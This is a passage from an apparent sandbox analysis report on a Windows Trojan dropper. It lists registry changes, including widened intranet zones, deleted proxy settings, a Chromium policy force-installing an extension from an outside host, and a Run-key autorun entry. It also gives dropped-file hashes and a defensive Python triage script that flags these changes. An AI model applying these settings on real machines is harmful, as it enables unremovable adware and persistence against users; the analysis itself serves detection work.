[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 27 F1 88 0E E1 75 18 33 F1 61 EB 6C 2F 8C 6C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
The Trojan sets the IE Local Intranet zone membership rule "Include all network paths (UNCs)":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the IE Local Intranet zone membership rule "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets the IE Local Intranet zone membership rule "Include all local (intranet) sites not listed in other zones":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
These three ZoneMap values match IE's default Local Intranet membership rules, so writing them is weak evidence on its own; the proxy changes are the more telling part.
The Trojan deletes the following value(s) from the system registry, removing any configured proxy server, proxy exception list and automatic configuration (PAC) URL:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsr1A.tmp:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 94 7D 8D DD B7 45 67 F5 A0 16 99 EB A9 8A C7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan sets the IE Local Intranet zone membership rule "Include all network paths (UNCs)":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the IE Local Intranet zone membership rule "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets the IE Local Intranet zone membership rule "Include all local (intranet) sites not listed in other zones":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) from the system registry, removing any configured proxy server, proxy exception list and automatic configuration (PAC) URL:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst16.tmp:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 5F F4 C3 D1 3D 20 02 09 11 EB 20 ED 21 F9 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan sets the IE Local Intranet zone membership rule "Include all network paths (UNCs)":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the IE Local Intranet zone membership rule "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets the IE Local Intranet zone membership rule "Include all local (intranet) sites not listed in other zones":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) from the system registry, removing any configured proxy server, proxy exception list and automatic configuration (PAC) URL:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsw7.tmp:1224 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 8B 40 2E BA BA 89 2F 39 61 50 03 36 01 DD 79"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-obi-tot-mdh-lvs-ppt-opw-jot-crr"
The process nsn24.tmp:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Setup3.exe" = "baidu Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 F8 10 64 69 5D 7A C5 76 47 62 07 CB 12 CB A6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan sets the IE Local Intranet zone membership rule "Include all network paths (UNCs)":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the IE Local Intranet zone membership rule "Include all local (intranet) sites not listed in other zones":
"IntranetName" = "1"
The Trojan sets the IE Local Intranet zone membership rule "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
The process setup3.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 01 3C 9B AC CA EA 5D 94 CA E5 B2 F5 8C 9F 05"
The process nsoB.tmp:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 F8 D3 59 A7 F6 6C A4 6E F7 B5 F6 2A 37 1F 4D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process adv_128.exe:1276 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 1F 37 31 23 99 9D 0E 3A 97 E2 F4 64 72 1C 3D"
The Trojan sets Chromium enterprise policies that allow ext.internetquickaccess.com as an extension install source and force-install the extension pcjnhdkacfipfoicilllfabpbghiegpn from that host's update URL (a force-installed extension cannot be removed by the user from the browser UI):
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallSources]
"1" = "http://ext.internetquickaccess.com/*"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"
The process setup3.tmp:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 BB 33 3D 28 F3 1B E8 6D 54 26 0D 95 44 D7 18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"bind.exe" = "Bind"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan sets the IE Local Intranet zone membership rule "Include all local (intranet) sites not listed in other zones":
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan sets the IE Local Intranet zone membership rule "Include all network paths (UNCs)":
"UNCAsIntranet" = "1"
The Trojan sets the IE Local Intranet zone membership rule "Include all sites that bypass the proxy server":
"ProxyBypass" = "1"
To run automatically each time the current user logs on, the Trojan registers its dropped file under the following autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"apphide" = "%Program Files%\baidu\ppt.exe"
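As an added example (not part of the Lavasoft report), the following Python script parses registry entries written in the key/value notation this report uses and flags the changes above that matter for triage: the ZoneMap values that widen the Local Intranet zone, the deleted proxy/PAC values, the Chromium ExtensionInstallForcelist entry whose update URL is not Google's, and the HKCU Run persistence entry. The sample input is a constructed subset copied from the entries listed above; treating clients2.google.com as the only benign update host is an assumption of this example.

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit

# Constructed sample in the key/value notation this report uses, copied from
# the registry entries listed above (a subset, not the whole report).
SAMPLE_REPORT = r'''
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 BB 33 3D 28 F3 1B E8 6D 54 26 0D 95 44 D7 18"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"apphide" = "%Program Files%\baidu\ppt.exe"
'''

Finding = namedtuple("Finding", "key name value reason")

KEY_RE = re.compile(r'^\[(.+)\]$')                 # [HKCU\...\Key]
SET_RE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"$')   # "name" = "value"
DELETED_RE = re.compile(r'^"([^"]*)"$')            # "name" under a "deletes" heading


def parse_report(text):
    """Yield (key, name, value) from the report text; value is None for deletions."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        if key is None:
            continue
        m = SET_RE.match(line)
        if m:
            yield key, m.group(1), m.group(2)
            continue
        m = DELETED_RE.match(line)
        if m:
            yield key, m.group(1), None


# ZoneMap values that, when set to 1, widen Local Intranet zone membership.
ZONEMAP_WIDENING = {"UNCAsIntranet", "IntranetName", "ProxyBypass"}
# Proxy/PAC values whose deletion silently drops an enterprise proxy setup.
PROXY_VALUES = {"AutoConfigURL", "ProxyServer", "ProxyOverride"}
RUN_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")
FORCELIST_SUFFIXES = ("\\policies\\chromium\\extensioninstallforcelist",
                      "\\policies\\google\\chrome\\extensioninstallforcelist")
# Assumption of this example: only Google's own update endpoint is benign.
TRUSTED_UPDATE_HOST = "clients2.google.com"


def triage(text):
    """Return the security-relevant registry changes found in the report text."""
    findings = []
    for key, name, value in parse_report(text):
        k = key.lower()
        if value is None:
            if k.endswith("\\internet settings") and name in PROXY_VALUES:
                findings.append(Finding(key, name, value, "proxy/PAC configuration removed"))
        elif k.endswith("\\internet settings\\zonemap"):
            if name in ZONEMAP_WIDENING and value == "1":
                findings.append(Finding(key, name, value, "Local Intranet zone membership widened"))
        elif k.endswith(RUN_SUFFIXES):
            findings.append(Finding(key, name, value, "logon persistence via Run key"))
        elif k.endswith(FORCELIST_SUFFIXES):
            ext_id, _, update_url = value.partition(";")   # policy format: id;update_url
            host = urlsplit(update_url).hostname or ""
            if host != TRUSTED_UPDATE_HOST:
                findings.append(Finding(key, name, value,
                                        f"forced install of extension {ext_id} from {host}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REPORT):
        print(f"{f.reason}: {f.key} -> {f.name} = {f.value}")
```

Run the block directly to print the findings, or feed it the full report text to triage every process section at once. The RNG Seed writes that appear under nearly every process are skipped deliberately: CryptoAPI rewrites that value whenever a process draws randomness, so it says nothing about the sample.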
Dropped PE files
| MD5 | File path |
|---|---|
| a85df53ac3cdc0b948809c73b39b0571 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\avg18.exe |
| 3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh1D.tmp |
| f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\inetc.dll |
| d70820984ba4484885bf5c56ae44c4ec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nskE.tmp |
| a66865416d1330f1c571c12f4f8c2fea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr1A.tmp |
| 29bf30427bc3544fab563d0d7d36f05d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst16.tmp |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst20.tmp\registry.dll |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst22.tmp\registry.dll |
| a66865416d1330f1c571c12f4f8c2fea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
| 29bf30427bc3544fab563d0d7d36f05d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe |
| 3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe |
| dd326cafa8f8dfb20c5183a1cc3daab6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe |
| 900c797ab605bac6ba0de7e9aba3e7d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe |
| a85df53ac3cdc0b948809c73b39b0571 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe |
HOSTS file anomalies
No changes have been detected.
